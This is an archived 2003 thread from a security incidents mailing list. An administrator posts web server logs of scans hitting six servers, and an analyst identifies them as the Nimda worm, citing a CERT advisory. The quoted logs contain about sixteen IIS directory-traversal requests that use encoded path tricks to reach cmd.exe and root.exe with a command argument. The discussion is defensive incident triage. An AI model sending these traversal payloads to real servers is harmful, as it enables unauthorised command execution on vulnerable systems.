Re: Anyone know this tool?

From: Danny (danny_at_eboundary.com)
Date: 07/29/03

  • Next message: Jason Falciola: "Re: Anyone know this tool?" 
    Date: Tue, 29 Jul 2003 13:10:02 -0400
To: Jason Falciola <falciola@us.ibm.com>

    hrm ok, I'm going to crawl back into my hole now :)

    I'm kind of confused as to why i haven't see any of these patterns
    before the last 2 days though, Oh well.

    Thanks guys.

    On Tuesday, July 29, 2003, at 12:57 PM, Jason Falciola wrote:

    > Looks like plain old Nimda to me. Someone please correct me if I'm
    > missing something obvious.
    >
    > <http://www.cert.org/advisories/CA-2001-26.html>
    >
    > Jason Falciola
    > Security Intelligence Analyst
    > IBM Managed Security Services
    > falciola@us.ibm.com
    >
    >
    >
    >
    >
    >
    > Danny <danny@eboundary.com>
    > 07/28/2003 11:24 PM
    >
    >
    > To: incidents@securityfocus.com
    > cc:
    > Subject: Anyone know this tool?
    >
    >
    >
    > Does anyone happen to know what tool this is? I've seen the exact same
    > scans on 6 of our servers on completely different networks. All the
    > scans have been from different source IP's and all the servers were hit
    > within a space of a few hours.
    >
    > Curiosity is getting the better of me since i've never seen this exact
    > pattern before :)
    >
    > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
    > /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
    > /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    > "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
    > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    > HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
    > HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
    > winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    > "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
    > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    > "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    > "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    > "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
    > "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
    > "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
    > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    > "-" "-"
    > 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET
    > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
    > "-"
    >
    > Danny
    > Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    > Play - http://www.eBoundary.net - Who really sets your electronic
    > boundaries?
    > AIM: eBoundaryTch | ICQ: 3090141
    >
    >
    > -----------------------------------------------------------------------
    > ----
    > -----------------------------------------------------------------------
    > -----
    >
    >
    >
    >
    >
    >
    >
    Danny
    Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    Play - http://www.eBoundary.net - Who really sets your electronic
    boundaries?
    AIM: eBoundaryTch | ICQ: 3090141

    ---------------------------------------------------------------------------
    ----------------------------------------------------------------------------

  • Next message: Jason Falciola: "Re: Anyone know this tool?"

    Relevant Pages

    • Re: Anyone know this tool?
      ... > Network Systems Engineer ... I've seen the exact same ... > scans on 6 of our servers on completely different networks. ...
      (Incidents)
    • Re: New? software idea: Graphical mouse login and authentification system
      ... > replace the old fashion password authentification method. ... > signature onto a canvas on the login screen. ... You make it either quite forgiving of the exact patterns, ...
      (comp.os.linux.misc)
    • Re: problem with DATA statements
      ... REAL values isn't so far from initializing REAL variables with ... As far as I know, IBM started with Z constants as bit patterns, ... first hex machine (instruction fields on four bit boundaries ... instead of three bit boundaries) and that DEC printed calendars ...
      (comp.lang.fortran)
    • Re: [PATCH] pop previous section in alternative.c
      ... So in summary valid section patterns are either ... the assembler should see patterns like ... could ever be valid to have sizes that cross section boundaries (it's a ... .size directive writes some debug info or similar, and we can create a big ...
      (Linux-Kernel)
    • Re: Purchase Advice Needed
      ... That was the end of the "make the servers cheaper" whining. ... Consumer grade stuff is of course even worse. ... These worst-case patterns occur infrequently in real life ... repeatable manner due to shortcuts in design which result in low cost. ...
      (sci.electronics.design)